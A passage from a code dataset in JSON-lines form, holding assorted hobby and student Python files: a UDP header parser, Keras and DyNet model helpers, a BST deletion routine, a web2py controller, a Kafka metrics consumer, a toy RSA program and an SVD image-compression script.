value of zero is inserted.\n\n# Destination Port has a meaning within the context of a particular\n# internet destination address.\n\n# Length is the length in octets of this user datagram including this\n# header and the data. (This means the minimum value of the length is\n# eight.)\n\nUDP_MIN_HDRLEN = 8\n\n# Checksum is the 16-bit one's complement of the one's complement sum of a\n# pseudo header of information from the IP header, the UDP header, and the\n# data, padded with zero octets at the end (if necessary) to make a\n# multiple of two octets.\n\n# The pseudo header conceptually prefixed to the UDP header contains the\n# source address, the destination address, the protocol, and the UDP\n# length. This information gives protection against misrouted datagrams.\n# This checksum procedure is the same as is used in TCP.\n\n# 0 7 8 15 16 23 24 31\n# +--------+--------+--------+--------+\n# | source address |\n# +--------+--------+--------+--------+\n# | destination address |\n# +--------+--------+--------+--------+\n# | zero |protocol| UDP length |\n# +--------+--------+--------+--------+\n\n# If the computed checksum is zero, it is transmitted as all ones (the\n# equivalent in one's complement arithmetic). An all zero transmitted\n# checksum value means that the transmitter generated no checksum (for\n# debugging or for higher level protocols that don't care).\n\nclass UDP(ctypes.BigEndianStructure):\n\n _align_ = 1\n\n _fields_ = [\n ('udp_sport', ctypes.c_uint16), # /* 32 bit Source Address */\n ('udp_dport', ctypes.c_uint16), # /* 32 bit Destination Address */\n ('udp_len', ctypes.c_uint16), # /* 16 bit length = header + data */\n ('udp_checksum', ctypes.c_uint16), # /* 16 bit UDP Checksum */\n\n # ('udp_data', bytes) # /* Possible Lengths, UDP Data */\n ]\n\n def __init__(self, udp_sport=0, udp_dport=0, udp_len=UDP_MIN_HDRLEN, udp_checksum=0, udp_data=b''):\n super(UDP, self).__init__(udp_sport, udp_dport, udp_len, udp_checksum)\n\n self.udp_data = udp_data\n\n def pack(self):\n '''pack an udp object into binary data.'''\n bindata = ctypes.string_at(ctypes.addressof(self), ctypes.sizeof(self))\n bindata += self.udp_data\n\n return bindata\n\n def unpack(self, buf):\n '''unpack binary buf into an udp object.'''\n\n if not isinstance(buf, bytes):\n raise Exception('unpack buffer must be a byte string.')\n\n cstring = ctypes.create_string_buffer(buf)\n ctype_instance = ctypes.cast(ctypes.pointer(cstring), ctypes.POINTER(UDP)).contents\n\n ctype_instance.udp_data = buf[UDP_MIN_HDRLEN:len(buf)] # /* UDP Data */\n\n return ctype_instance\n\n def wireshark_print(self):\n '''output binary packet as what wireshark prints.'''\n print(\"User Datagram Protocol, Src Port: %d, Dst Post: %d\" % (self.udp_dport, self.udp_dport))\n print(\"Source Port: %d\" % self.udp_sport)\n print(\"Destination Port: %d\" % self.udp_dport)\n print(\"Length: %d\" % self.udp_len)\n print(\"Checksum: 0x%04x\" % self.checksum())\n\n def checksum(self, msg=None):\n '''sum protocol checksum'''\n\n # https://github.com/emamirazavi/python3-ping/blob/master/ping.py#L246\n # https://stackoverflow.com/questions/3949726/calculate-ip-checksum-in-python\n\n self.udp_checksum = 0 # Initialize ip_sum to zero (First)\n msg = msg if msg else self.raw # calculate (Second)\n\n f = lambda a, b: ((a + b) & 0xffff) + ((a + b) >> 16)\n n = len(msg)\n cnt = (n // 2) * 2\n s = 0\n\n for i in range(0, cnt, 2):\n x = msg[i]\n y = msg[i+1]\n\n try:\n w = ord(x) + (ord(y) << 8) # Python 3\n except:\n w = x + (y << 8) # Python 2\n\n s = f(s, w)\n\n s &= 0xffffffff\n \n s += (s >> 16)\n s = ~s & 0xffff\n\n s = socket.htons(s)\n self.udp_checksum = s\n return s\n\n @property\n def raw(self):\n '''udp raw data'''\n return self.pack()\n\n def __str__(self):\n '''return packet binary as a string.'''\n return str(self.pack())\n\n def __len__(self):\n '''return packet length.'''\n return ctypes.sizeof(self)\n\n\nif __name__ == '__main__':\n bindata = b'\\x14\\xe9\\x14\\xe9\\x00\\x30\\x9b\\xfd\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x5f\\x67\\x6f\\x6f\\x67\\x6c\\x65\\x63\\x61\\x73\\x74\\x04\\x5f\\x74\\x63\\x70\\x05\\x6c\\x6f\\x63\\x61\\x6c\\x00\\x00\\x0c\\x80\\x01'\n\n udp = UDP()\n udp.pack()\n udp.wireshark_print()\n\n newudp = udp.unpack(bindata)\n newudp.wireshark_print()\n\n\n## References\n\n# https://tools.ietf.org/html/rfc768","repo_name":"nixawk/hello-python2","sub_path":"ctypes/protocols/udp.py","file_name":"udp.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"34"} +{"seq_id":"31634629310","text":"# Basic Packages\nimport pandas as pd\nimport numpy as np\nimport re\nimport nltk\n\n# Modeling\nfrom keras.models import Sequential\nfrom keras.layers.core import Activation, Dropout, Dense\nfrom keras.layers import Flatten, LSTM, Bidirectional, Layer\nfrom keras.layers import Embedding\nfrom keras.activations import softmax\nfrom keras import backend as K\n\n# Visualization\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set()\n\n## Function adopted from \n#Preprovessing function to remove tags, html, special characters,and etc\nclass pre_pro:\n def __init__(self):\n self.TAG_RE = re.compile(r'<[^>]+>')\n def preprocess_text(self,inputSentence):\n # Removing html tags\n sentence = self.TAG_RE.sub('', inputSentence)\n\n # Remove punctuations and numbers\n sentence = re.sub('[^a-zA-Z]', ' ', sentence)\n\n # Single character removal\n sentence = re.sub(r\"\\s+[a-zA-Z]\\s+\", ' ', sentence)\n\n # Removing multiple spaces\n sentence = re.sub(r'\\s+', ' ', sentence)\n\n return sentence\n\nclass self_model:\n def __init__(self,vs,em,maxlen = 100,d=100):\n self.maxlen = maxlen\n self.seqModel = Sequential()\n self.embedding_layer = Embedding(vs, d, weights=[em], input_length=maxlen , trainable=False)\n self.seqModel.add(self.embedding_layer)\n \n def simpleNN(self):\n self.seqModel.add(Flatten())\n self.seqModel.add(Dense(1, activation='sigmoid'))\n self.seqModel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])\n print(self.seqModel.summary())\n return(self.seqModel)\n \n def LSTM(self, soft = False, results = 1):\n self.seqModel.add(LSTM(128))\n if soft:\n self.seqModel.add(Dense(results, activation='softmax'))\n self.seqModel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc'])\n else:\n self.seqModel.add(Dense(1, activation='sigmoid'))\n self.seqModel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])\n print(self.seqModel.summary())\n return(self.seqModel)\n \n def bi_LSTM(self, Att = False,soft = False, results = 1):\n if Att:\n self.seqModel.add(Bidirectional(LSTM(128,return_sequences=True)))\n self.seqModel.add(Attention(return_sequences=True))\n self.seqModel.add(LSTM(128))\n else:\n self.seqModel.add(Bidirectional(LSTM(128)))\n if soft:\n self.seqModel.add(Dense(results, activation='softmax'))\n self.seqModel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc'])\n else:\n self.seqModel.add(Dense(1, activation='sigmoid'))\n self.seqModel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])\n print(self.seqModel.summary())\n return(self.seqModel)\n \n def show_performance_plot(history):\n fig, (ax1,ax2) = plt.subplots(1,2,figsize=(10, 5))\n #show the model accuracy\n ax1.plot(history.history['acc'],label='train')\n ax1.plot(history.history['val_acc'],label='test')\n\n ax1.set(title='model accuracy',xlabel='epoch',ylabel='accuracy')\n ax1.legend(loc='upper left')\n #show model loss\n ax2.plot(history.history['loss'],label='train')\n ax2.plot(history.history['val_loss'],label='test')\n\n ax2.set(title='model loss',xlabel='epoch',ylabel='loss')\n ax2.legend(loc='upper right')\n fig.tight_layout()\n return(fig)\n\n \n# The Following Class for attention layer is adopted from \n# https://stackoverflow.com/questions/62948332/how-to-add-attention-layer-to-a-bi-lstm\n \nclass Attention(Layer):\n def __init__(self, return_sequences=True):\n self.return_sequences = return_sequences\n super(Attention,self).__init__()\n \n def build(self, input_shape):\n\n self.W=self.add_weight(name=\"att_weight\", shape=(input_shape[-1],1),\n initializer=\"normal\")\n self.b=self.add_weight(name=\"att_bias\", shape=(input_shape[1],1),\n initializer=\"zeros\")\n\n super(Attention,self).build(input_shape)\n\n def call(self, x):\n\n e = K.tanh(K.dot(x,self.W)+self.b)\n a = K.softmax(e, axis=1)\n output = x*a\n\n if self.return_sequences:\n return output\n\n return K.sum(output, axis=1)\nclass performance_evplot:\n def __init__(self,h):\n fig, (ax1,ax2) = plt.subplots(1,2,figsize=(10, 5))\n #show the model accuracy\n ax1.plot(h.history['acc'],label='train')\n ax1.plot(h.history['val_acc'],label='test')\n\n ax1.set(title='model accuracy',xlabel='epoch',ylabel='accuracy')\n ax1.legend(loc='upper left')\n #show model loss\n ax2.plot(h.history['loss'],label='train')\n ax2.plot(h.history['val_loss'],label='test')\n\n ax2.set(title='model loss',xlabel='epoch',ylabel='loss')\n ax2.legend(loc='upper right')\n fig.tight_layout()","repo_name":"siuol456/NLPResearch","sub_path":"SentimentModel/Functions/Modeling_functions.py","file_name":"Modeling_functions.py","file_ext":"py","file_size_in_byte":5063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25560361835","text":"#! /Users/xiaotongli/anaconda3/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 10/12/18 10:52 PM\n# @Author : Xiaotong Li\n# @School : University of California, Santa Cruz\n# @FileName: deleteNode.py\n# @Software: PyCharm\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def deleteNode(self, root, key):\n \"\"\"\n :type root: TreeNode\n :type key: int\n :rtype: TreeNode\n \"\"\"\n # first search the key and determine how many child the node has,\n if not root:\n return root\n if root.val > key:\n root.left = self.deleteNode(root.left, key)\n elif root.val < key:\n root.right = self.deleteNode(root.right, key)\n else:\n if not root.right:\n return root.left\n if not root.left:\n return root.right\n temp = root.right\n mini = temp.val\n while temp.left:\n temp = temp.left\n mini = temp.val\n root.val = mini\n root.right = self.deleteNode(root.right, root.val)\n return root\n","repo_name":"jxlxt/leetcode","sub_path":"Python/BinarySearchTree/deleteNode.py","file_name":"deleteNode.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3447450867","text":"SAVE = \"Uložit\"\nKMB_CENA = 2200 # KMB_CENA duplicitně v portal.py ; také v portal/kmb.py aktualizuj výši slevy [%]\n\n\n@auth.requires_login()\ndef add():\n form = SQLFORM(db.kmb, submit_text=SAVE)\n if form.process().accepted:\n redirect(URL('portal', 'main'))\n response.view = 'kmb/edit.html'\n response.files.append(URL('static', 'js/bootbox.min.js'))\n return dict(form=form, kmb_id=None, KMB_CENA=KMB_CENA)\n\n\n@auth.requires_login()\ndef edit():\n next = URL('portal', 'main')\n try:\n kmb_id = int(request.args(0))\n except (TypeError, ValueError):\n kmb_id = None\n if kmb_id is None:\n redirect(next)\n kmb = db(db.kmb.id == kmb_id).select(db.kmb.auth_user_id).first()\n if not kmb or kmb.auth_user_id != auth.user_id:\n redirect(next)\n\n form = SQLFORM(db.kmb, kmb_id, submit_text=SAVE, showid=False)\n if form.process().accepted:\n redirect(next)\n response.files.append(URL('static', 'js/bootbox.min.js'))\n return dict(form=form, kmb_id=kmb_id, KMB_CENA=KMB_CENA)\n\n\n@auth.requires_login()\ndef delete():\n next = URL('portal', 'main')\n try:\n kmb_id = int(request.args(0))\n except (TypeError, ValueError):\n kmb_id = None\n if kmb_id is None:\n redirect(next)\n\n db((db.kmb.id == kmb_id) & (db.kmb.auth_user_id == auth.user_id)).delete()\n redirect(next)\n","repo_name":"zvolsky/zv","sub_path":"controllers/kmb.py","file_name":"kmb.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15613764124","text":"import os\nimport json\nfrom kafka import KafkaConsumer\n\nKAFKA_BROKER_URL = os.environ.get('KAFKA_BROKER_URL')\nMETRIC_TOPIC = os.environ.get(\"METRIC_TOPIC\")\n\nprocess_time_sum = 0\nrecords_processed = 0\n\n\ndef aggregate_stats():\n \"\"\"\n Aggregates list of metrics into sums and averages\n to give overall performance of microservice.\n Returns dict of form:\n {\n \"Records_Processed\": int,\n \"Avg_Records_Per_Second\": float\n }\n\n :return: dict of form above\n \"\"\"\n # If data is empty, don't do anything:\n if process_time_sum == 0:\n return {}\n\n return {\n \"Records_Processed\": records_processed,\n \"Avg_Records_Per_Second\":\n records_processed / process_time_sum,\n }\n\n\nif __name__ == '__main__':\n consumer = KafkaConsumer(\n METRIC_TOPIC,\n bootstrap_servers=KAFKA_BROKER_URL,\n value_deserializer=lambda value: json.loads(value),\n consumer_timeout_ms=15000\n )\n\n # Consumer metrics from kafka topic\n # and add to metric_agg dict of lists\n for message in consumer:\n process_time_sum += message.value[\"process_time\"]\n records_processed += message.value[\"records_processed\"]\n\n # When we're done, aggregate results\n # And print off metrics\n result = aggregate_stats()\n print(\"INGESTION METRICS\")\n for key, val in result.items():\n print(key, \":\", val)\n print()\n","repo_name":"schwertJake/Kafka_DDOS_Detection","sub_path":"ingest_metrics/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35048960230","text":"import os\r\nimport mutagen\r\n\r\ndef length_music_file(address):\r\n if address[-3:] == \"mp3\" or address[-3:] == \"m4a\":\r\n return int(mutagen.File(address).info.length) # legth\r\n else:\r\n return 0\r\n\r\n\r\ndef change_address(address, root, name):\r\n name_change = name[:-4]\r\n pos = 0\r\n for i, x in enumerate(name_change):\r\n if x.isalpha():\r\n pos = i\r\n break\r\n new_name = root + \"\\\\\" + name[pos:].capitalize()\r\n try:\r\n os.rename(address, new_name)\r\n except FileExistsError:\r\n os.remove(address)\r\n\r\n\r\ndirectory_list = list()\r\nfor root, dirs, files in os.walk(\"D:/Test\", topdown=False):\r\n for name in files:\r\n now_file = os.path.join(root, name)\r\n now_file_length = length_music_file(now_file)\r\n if now_file_length <= 60 or now_file_length >= 360:\r\n os.remove(now_file)\r\n else:\r\n change_address(now_file, root, name)\r\n\r\n","repo_name":"Oskorbin99/Learn_Python","sub_path":"Scripts/Work_with_new_music.py","file_name":"Work_with_new_music.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72913118179","text":"\"\"\"\nake the following IPv4 address: 128.32.10.1\n\nThis address has 4 octets where each octet is a single byte (or 8 bits).\n\n1st octet 128 has the binary representation: 10000000\n2nd octet 32 has the binary representation: 00100000\n3rd octet 10 has the binary representation: 00001010\n4th octet 1 has the binary representation: 00000001\nSo 128.32.10.1 == 10000000.00100000.00001010.00000001\n\nBecause the above IP address has 32 bits, we can represent it as the unsigned 32 bit number: 2149583361\n\nComplete the function that takes an unsigned 32 bit number and returns a string representation of its IPv4 address.\n\nExamples\n2149583361 ==> \"128.32.10.1\"\n32 ==> \"0.0.0.32\"\n0 ==> \"0.0.0.0\"\n\nThe code below need further work\n\"\"\"\nimport math\ndef int32_to_ip(int32):\n # your code here\n if int32 is None:\n return \"\"\n if int32==0:\n return \"0.0.0.0\"\n else:\n base=int(math.log(int32,2))\n if int(math.pow(2,base))==int32:\n return f\"{int32}.0.0.0\"\n bit1=str(bin(int32)).replace('0b','')[0:8]\n bit2=str(bin(int32)).replace('0b','')[8:16]\n bit3=str(bin(int32)).replace('0b','')[16:24]\n bit4=str(bin(int32)).replace('0b','')[24:32]\n lst=[int(bit1,2),int(bit2,2),int(bit3,2),int(bit4,2)]\n ip4=str(lst[0])+\".\"+str(lst[1])+\".\"+str(lst[2])+\".\"+str(lst[3])\n return ip4\n\n\n\nprint(int32_to_ip(256))\n","repo_name":"YabseraBogale/python-Scripts","sub_path":"Ip4.py","file_name":"Ip4.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2581693325","text":"# -*- coding: utf-8 -*-\n\nfrom setuptools import find_packages, setup\n\nversion='0.4'\n\nsetup(name='icalview',\n version=version,\n description=\"Provide icalendar export for Queries\",\n author='Xavier Péchoultres',\n author_email='x.pechoulres@clariprint.com',\n url='http://trac-hacks.org/wiki/IcalViewPlugin',\n keywords='trac plugin icalendar',\n license=\"GPL\",\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests*']),\n include_package_data=True,\n zip_safe=False,\n install_requires=[],\n entry_points = \"\"\"\n [trac.plugins]\n icalview = icalview\n \"\"\",\n )\n\n","repo_name":"woochica/trachacks","sub_path":"icalviewplugin/0.11/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25650361295","text":"# RSA Algorithm\n# By Sazzad Saju\n# CSE, HSTU\n#\n# Description: KeyGenerator program creates public_key (n,e) and\n# private_key (p,q). This RSA program will work for small primes\n# to big primes and generate encrypted string in HEX. Symmetric-\n# key should be encrypted using RSA before transmiting on online.\nimport pyperclip\n\ndef ConvertToInt(message):\n grd = 1\n num = 0\n message = message[::-1]\n for i in range(0, len(message), +1):\n num = num + ord(message[i]) * grd\n grd *= 256\n return num\n\ndef mod_ex(b, k, m):\n i = 1\n j = 0\n while (j <= k):\n b = (b * i) % m\n i = b\n j += 1\n return b\n\ndef PowMod(b, e, m):\n bin_e = bin(e)\n bin_e = bin_e[::-1]\n ln = len(bin_e)\n result = 1\n for i in range(0, ln - 2, +1):\n if (bin_e[i] == '1'):\n result *= mod_ex(b, i, m)\n return result % m\n\ndef Encrypt(message, modulo, e):\n cytxt = \"\"\n temp = modulo // 256\n per_char = 0\n while (temp != 0):\n temp = temp // 256\n per_char += 1\n cyln = pow(256, per_char)\n cyln = len(str(cyln)) + 1\n s = message\n for i in range(0, len(message), +per_char):\n s1 = s[:per_char]\n b = ConvertToInt(s1)\n cytxt1 = str(PowMod(b, e, modulo))\n if (len(cytxt1) < cyln):\n while ((cyln - len(cytxt1) > 0)):\n cytxt1 = \"0\" + cytxt1\n cytxt += cytxt1\n else:\n cytxt += cytxt1\n s = s[per_char:]\n to_i = int(cytxt)\n to_h = '%X' % to_i\n hex_cytxt = str(to_h)\n return hex_cytxt\n\ndef eea(a, b):\n if (a % b == 0):\n return (b, 0, 1)\n else:\n gcd, s, t = eea(b, a % b)\n s = s - ((a // b) * t)\n return (gcd, t, s)\n\ndef InvertModulo(e, phi):\n gcd, s, _ = eea(e, phi)\n if (gcd != 1):\n return None\n else:\n return s % phi\n\ndef ConvertToStr(num):\n st = \"\"\n while (num != 0):\n temp = num % 256\n st += chr(temp)\n chr(temp)\n num = num - temp\n num = num // 256\n st = st[::-1]\n return st\n\ndef Decrypt(ciphertext,modulo, e):\n with open('private_key', 'r') as f:\n p = f.readline()\n p = int(p[:-1])\n q = int(f.readline())\n to_i = int(ciphertext, 16)\n ciphertext = str(to_i)\n phi = (p - 1) * (q - 1)\n d = InvertModulo(e, phi)\n temp = modulo // 256\n per_char = 0\n while (temp != 0):\n temp = temp // 256\n per_char += 1\n cyln = pow(256, per_char)\n cyln = len(str(cyln)) + 1\n while (len(ciphertext) % cyln != 0):\n ciphertext = \"0\" + ciphertext\n s = ciphertext\n m = \"\"\n for i in range(0, len(ciphertext), +cyln):\n s1 = s[:cyln]\n b = int(s1)\n m += ConvertToStr(PowMod(b, d, modulo))\n s = s[cyln:]\n return m\n\n\nwith open('public_key','r') as f:\n modulo = f.readline()\n modulo = int(modulo[:-1])\n e = int(f.readline())\nprint(\"1) Encryption\\n2) Decryption\\n\")\nindicator = input(\"Enter Your Choice: \")\nif(indicator==\"1\"):\n Message = input(\"Enter Message: \")\n ciphertext = Encrypt(Message, modulo, e)\n print(\"Ciphertext: {}\".format(ciphertext))\n pyperclip.copy(ciphertext)\n spam = pyperclip.paste()\n print(\"Ciphertext is copped to clipboard!\")\nelif(indicator == \"2\"):\n ciphertext = input(\"Enter Ciphertext: \")\n message = Decrypt(ciphertext, modulo, e)\n print(\"Message: {}\".format(message))","repo_name":"Sazzad-Saju/RSA_Algorithm","sub_path":"RSA Algorithm.py","file_name":"RSA Algorithm.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"20226032740","text":"#Improve comments later...\r\n\r\nfrom matplotlib import pyplot\r\nimport re\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\ndef read_pgm(filename, byteorder='>'):\r\n \"\"\"Return image data from a raw PGM file as numpy array.\r\n\r\n Format specification: http://netpbm.sourceforge.net/doc/pgm.html\r\n\r\n \"\"\"\r\n with open(filename, 'rb') as f:\r\n buffer = f.read()\r\n try:\r\n header, width, height, maxval = re.search(\r\n b\"(^P5\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n]\\s)*)\", buffer).groups()\r\n except AttributeError:\r\n raise ValueError(\"Not a raw PGM file: '%s'\" % filename)\r\n return np.frombuffer(buffer,\r\n dtype='u1' if int(maxval) < 256 else byteorder + 'u2',\r\n count=int(width) * int(height),\r\n offset=len(header)\r\n ).reshape((int(height), int(width)))\r\n\r\n\r\ndef display_pgm(array): # Shows unaltered photo\r\n print(\"1.\\n\")\r\n pyplot.imshow(array, pyplot.cm.gray)\r\n pyplot.title(\"A\")\r\n pyplot.axis('off')\r\n pyplot.show()\r\n\r\n\r\ndef svd(image): # Performing SVD to find UDV^T\r\n u, s, vt = np.linalg.svd(image)\r\n return u, s, vt\r\n\r\n\r\ndef u(u_matrix): # Scaled for better looking picture (U)\r\n u_max = np.amax(u_matrix)\r\n u_min = np.amin(u_matrix)\r\n u_scaled = 255 * ((u_matrix - u_min) / (u_max - u_min))\r\n pyplot.imshow(u_scaled, pyplot.cm.gray)\r\n pyplot.title(\"U\")\r\n pyplot.axis('off')\r\n pyplot.show()\r\n return u_matrix\r\n\r\n\r\ndef s(s_matrix): # Scaled for better looking picture (D)\r\n s_max = np.amax(s_matrix)\r\n s_min = np.amin(s_matrix)\r\n s_scaled = 255 * ((s_matrix - s_min) / (s_max - s_min))\r\n pyplot.imshow(np.diag(s_scaled[:1]), pyplot.cm.gray)\r\n pyplot.title(\"D\")\r\n pyplot.axis('off')\r\n pyplot.show()\r\n return s_matrix\r\n\r\n\r\ndef vt(vt_matrix): # Scaled for better looking picture (V)\r\n vt_max = np.amax(vt_matrix)\r\n vt_min = np.amin(vt_matrix)\r\n vt_scaled = 255 * ((vt_matrix - vt_min) / (vt_max - vt_min))\r\n pyplot.imshow(vt_scaled, pyplot.cm.gray)\r\n pyplot.title(\"V^T\")\r\n pyplot.axis('off')\r\n pyplot.show()\r\n return vt_matrix\r\n\r\n\r\ndef recon(u_matrix, s_matrix, vt_matrix,\r\n img): # Reconstructing the image in parts to show the effect of gradually less compression\r\n print(\"2.\\n\")\r\n for i in range(1, 6):\r\n reconstruct = np.matrix(u_matrix[:, :i]) * np.diag(s_matrix[:i]) * np.matrix((vt_matrix[:i, :]))\r\n pyplot.imshow(reconstruct, cmap='gray')\r\n title = str(i)\r\n pyplot.title(\"p = \" + title)\r\n pyplot.axis('off')\r\n pyplot.show()\r\n for i in range(10, 101, 10):\r\n reconstruct = np.matrix(u_matrix[:, :i]) * np.diag(s_matrix[:i]) * np.matrix(vt_matrix[:i, :])\r\n pyplot.imshow(reconstruct, cmap='gray')\r\n title = str(i)\r\n pyplot.title(\"p = \" + title)\r\n pyplot.axis('off')\r\n pyplot.show()\r\n\r\n\r\ndef small_comp(u_matrix, s_matrix, vt_matrix,\r\n img): # Finding the smallest iterationg before compression becomes negative\r\n for i in range(0, 100):\r\n reconstruct = np.matrix(u_matrix[:, :i]) * np.diag(s_matrix[:i]) * np.matrix(vt_matrix[:i, :])\r\n compression = 1 - ((i * img.shape[0]) + i + (i * img.shape[1])) / (img.shape[0] * img.shape[1])\r\n title = str(i)\r\n if compression < 0:\r\n print(\r\n \"\\n4. Negative values for compression occur as the p value gets large as a result of more pixels are being used to create the output image as there are in the original picture, this is because more matrix values are in the reconstruct image as the orignal and these values are still plotted. \\nAt p = \" + title + \" the p value is the smallest when compression becomes negative (\" + (\r\n \"{:.1%}\".format(compression)) + \")\")\r\n break\r\n\r\n\r\ndef threec(img, u_matrix, s_matrix, vt_matrix): # p, max error, mean error, compression % for all compression levels\r\n p_list = []\r\n emax = []\r\n emean = []\r\n comp = []\r\n for i in range(1, 6):\r\n reconstruct = np.matrix(u_matrix[:, :i]) * np.diag(s_matrix[:i]) * np.matrix((vt_matrix[:i, :]))\r\n p_list.append(str(i))\r\n max_err = str(np.amax(abs(img - reconstruct)))\r\n emax.append(str(\"{:.3f}\".format(float(max_err))))\r\n mean_err = str(np.mean(abs(img - reconstruct)))\r\n emean.append(str(\"{:.3f}\".format(float(mean_err))))\r\n compression_percent = 1 - ((i * img.shape[0]) + i + (i * img.shape[1])) / (img.shape[0] * img.shape[1])\r\n if float(compression_percent) < 0:\r\n comp.append(\"N/A\")\r\n else:\r\n comp.append(str(\"{:.1%}\".format(float(compression_percent))))\r\n for i in range(10, 101, 10):\r\n reconstruct = np.matrix(u_matrix[:, :i]) * np.diag(s_matrix[:i]) * np.matrix((vt_matrix[:i, :]))\r\n p_list.append(str(i))\r\n max_err = str(np.amax(abs(img - reconstruct)))\r\n emax.append(str(\"{:.3f}\".format(float(max_err))))\r\n mean_err = str(np.mean(abs(img - reconstruct)))\r\n emean.append(str(\"{:.3f}\".format(float(mean_err))))\r\n compression_percent = 1 - ((i * img.shape[0]) + i + (i * img.shape[1])) / (img.shape[0] * img.shape[1])\r\n if float(compression_percent) < 0:\r\n comp.append(\"N/A\")\r\n else:\r\n comp.append(str(\"{:.1%}\".format(float(compression_percent))))\r\n d = {\"p = \": p_list, \"Max error\": emax, \"Mean error\": emean, \"Compression\": comp}\r\n print(\"\\n3. \")\r\n print(pd.DataFrame(data=d))\r\n\r\n\r\ndef threed(img, u_matrix, s_matrix, vt_matrix, p_value): # What compression im happy with and why\r\n print(\"\\n5. The most compressed approximation that is acceptable for me is when p = \" + str(\r\n p_value) + \" . I feel that at a normal viewing distance between the user and the computer the compression past this point shows nearly no signs of improvement. If I was to can the viewing distance to be between me and a TV then I assume you can take a very low p value (high compression) as the image is so small that differences in pixels would be nearly impossible to spot.\")\r\n reconstruct = np.matrix(u_matrix[:, :p_value]) * np.diag(s_matrix[:p_value]) * np.matrix(vt_matrix[:p_value, :])\r\n compression_percent = \"{:.1%}\".format(\r\n 1 - ((p_value * img.shape[0]) + p_value + (p_value * img.shape[1])) / (img.shape[0] * img.shape[1]))\r\n mean_err = str(np.mean(abs(img - reconstruct)))\r\n print(\"Compression = \" + str(compression_percent) + \". Mean error = \" + str(\"{:.3f}\".format(float(mean_err))))\r\n\r\n\r\ndef main():\r\n image = read_pgm(\"me2.pgm\")\r\n display_pgm(image)\r\n u_matrix, s_matrix, vt_matrix = svd(image)\r\n u_pic = u(u_matrix)\r\n s_pic = s(s_matrix)\r\n vt_pic = vt(vt_matrix)\r\n p_values = recon(u_pic, s_pic, vt_pic, image)\r\n c_answer = threec(image, u_pic, s_pic, vt_pic)\r\n small_p = small_comp(u_pic, s_pic, vt_pic, image)\r\n d_answer = threed(image, u_pic, s_pic, vt_pic, 40)\r\n\r\n\r\nmain()\r\n","repo_name":"RSpe/SVD-Reconstruction","sub_path":"SVD Image Reconstruction.py","file_name":"SVD Image Reconstruction.py","file_ext":"py","file_size_in_byte":7093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18698871233","text":"import dynet as dy\nimport numpy as np\n\ndef orthonormal_initializer(output_size, input_size):\n \"\"\"\n adopted from Timothy Dozat https://github.com/tdozat/Parser/blob/master/lib/linalg.py\n \"\"\"\n # print (output_size, input_size)\n I = np.eye(output_size)\n lr = .1\n eps = .05/(output_size + input_size)\n success = False\n tries = 0\n while not success and tries < 10:\n Q = np.random.randn(input_size, output_size) / np.sqrt(output_size)\n for i in range(100):\n QTQmI = Q.T.dot(Q) - I\n loss = np.sum(QTQmI**2 / 2)\n Q2 = Q**2\n Q -= lr*Q.dot(QTQmI) / (np.abs(Q2 + Q2.sum(axis=0, keepdims=True) + Q2.sum(axis=1, keepdims=True) - 1) + eps)\n if np.max(Q) > 1e6 or loss > 1e6 or not np.isfinite(loss):\n tries += 1\n lr /= 2\n break\n success = True\n if success:\n # print('Orthogonal pretrainer loss: %.2e' % loss)\n pass\n else:\n # print('Orthogonal pretrainer failed, using non-orthogonal random matrix')\n Q = np.random.randn(input_size, output_size) / np.sqrt(output_size)\n return np.transpose(Q.astype(np.float32))\n\ndef set_orthonormal(p):\n p.set_value(orthonormal_initializer(p.shape()[0], p.shape[1]))\n\ndef clip_all(model, low=-1, high=1):\n for p in model.parameter_list():\n p.clip_inplace(low, high)\n\ndef leaky_relu(x):\n return dy.bmax(.1*x, x)\n\n\n# class MLP(object):\n# def __init__(self, model, di, dh, do):\n# self.model = model\n# self.bh = model.add_parameters(dh)\n# self.wh = model.add_parameters((dh, di))\n# self.bo = model.add_parameters(do)\n# self.wo = model.add_parameters((do, dh))\n\n# def forward(self, x):\n# h = dy.affine_transform([self.bh, self.wh, x])\n# o = dy.affine_transform([self.bo, self.wo, dy.tanh(h)])\n# return o\n\nclass MLP(object):\n def __init__(self, model, di, do, *dhs):\n self.model = model\n ds = [di] + list(dhs) + 